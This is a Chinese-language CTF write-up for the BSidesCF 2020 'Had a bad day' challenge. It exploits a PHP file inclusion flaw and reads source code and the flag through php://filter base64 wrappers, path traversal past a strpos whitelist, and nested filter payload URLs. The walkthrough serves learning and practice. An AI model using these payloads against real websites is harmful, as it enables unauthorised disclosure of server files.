首页 > 其他分享 >[BSidesCF 2020]Had a bad day

[BSidesCF 2020]Had a bad day

时间:2024-08-01 11:19:42浏览次数:13  
标签:category index url Had flag woofers bad 2020 php

[BSidesCF 2020]Had a bad day

参考:文件包含漏洞

Step

点一下按钮,发现URL发生改变:

url/index.php?category=woofers

修改尝试发现回显:

​ Sorry, we currently only support woofers and meowers.

继续尝试修改:

url/index.php?category=woofers.php;flag

回显:

Warning: include(woofers.php;flag.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 37

Warning: include(): Failed opening 'woofers.php;flag.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 37

意识到是文件包含

构造:

url/index.php?category=php://filter/convert.base64-encode/resource=index

将得到的源码解密,其中的php代码:

<?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

strpos(s1,s2)用来查找s2字符串在s1字符串中的位置,只要包含s2就行,所以只要category中包含woofers,meowers或者index就可以

所以构造:

url/index.php?category=php://filter/convert.base64-encode/resource=index/../flag

因为flag被注释了所以没有显示,利用伪协议嵌套也可以得到flag:

url/index.php?category=php://filter/convert.base64-encode/index/resource=flag
或
url/index.php?category=php://filter/read=index/convert.base64-encode/resource=flag

标签:category,index,url,Had,flag,woofers,bad,2020,php
From: https://www.cnblogs.com/bolerat/p/18336265

相关文章

  • WebApi连接数据库报错:尝试加载Oracle客户端时引发BadImageFormatException
    出现的问题  今天在公司用C#搭建一个WebApi服务,接受请求并连接数据库进行查询,但连接数据库时报错:尝试加载Oracle客户端时引发BadImageFormatException。如果安装32位客户端组件的情况下以64位模式运行,将出现此问题。问题点  我之后了解点,确定了OracleClient客户端确实安装......
  • P7215 [JOISC2020] 首都]
    P7215[JOISC2020]首都考虑对于颜色\(c_i\),若在此颜色集合内所有节点之间的路径上出现了其他颜色(如\(c_j\)),那我们则不得不将这两种颜色合并在一起,操作数加一。即对于颜色\(c_i\),若设其为首都,其答案(操作数)为所有颜色为\(c_i\)的节点之间的路径上的颜色种类......
  • [JOI 2020 Final] 火事 题解
    给一篇题解。(下面这张图是从luogu上粘贴的,因为不太会画图)其中纵坐标为\(t\),横坐标为\(a_i\)。发现同颜色块只有平行四边形和直角梯形(等腰直角三角形)两种情况。可以将直角梯形削去左下角,分成两部分考虑。等直可以直接暴力插入区间,总个数\(O(n)\)。平行四边形可以看作上......
  • [GYCTF2020]FlaskApp (pin码,jinja2绕过注入)
    题目就是flask下面是判断模版注入的方法a{*comment*}b和{{7*'7'}}base64编码后解码都报错no,无法判断模版引擎直接用下jinja2的试一试,把编码后的密文拿去解码,payload:{{"".__class__mro(2)__subclasses__()}}报错是jinja2后面就整不会了,看别人的wp整理一下:由于不......
  • Leetcode每日一题 202040726 2740.找出分区值
    题目描述给你一个正整数数组nums。将nums分成两个数组:nums1和nums2,并满足下述条件:数组nums中的每个元素都属于数组nums1或数组nums2。两个数组都非空。分区值最小。分区值的计算方法是|max(nums1)-min(nums2)|。其中,max(nums1)表示数组nums1......
  • Hadoop学习
                    hadoop的概念还没有完全了解完全,但是它的核心是处理和存储大数据,需要在虚拟机上面进行系统的测试......
  • 勤奋学习的第十三天(2020.7.30)
    1.MySQL中的DMLDML:数据库管理语言1.添加数据:insert1.指定具体列时添加数据:insert into 表名(列名,列名...) value(,,...)这种情况会向表中具体列中添加一条数据,数据内容在value中insertintostaff(id,code,name,salary)value(2,'1002','李四',12000);也可以......
  • 武汉工程大学2020GPLT选拔赛(重现赛)
    L2-4缘之空1.使用倍增法求最近公共祖先,然后利用公共祖先计算两点的树上距离2.但是此题并没有提供根节点,所以要先找到根节点以后才可以进行倍增法求lca/**-swj-*/>_____フ|__|/`ミ_xノ/|......
  • Hadoop学习总计
    Hadoop的另一重要组成部分是MapReduce,它作为一种分布式计算模型,在处理大规模数据集方面展现出了强大的能力。在我的学习过程中,掌握MapReduce的原理和实际操作成为了一个挑战。刚开始时,我发现编写和调试分布式任务并不容易,需要理解并克服许多复杂的技术难题。然而,通过深入学习MapR......
  • [GYCTF2020]Blacklist
    [GYCTF2020]BlacklistStep1输入1,回显:array(2){[0]=>string(1)"1"[1]=>string(7)"hahahah"}稍微尝试注入:/?inject=1'+union+select+1,2,3;#回显:returnpreg_match("/set|prepare|alter|rename|select|update|delete|dro......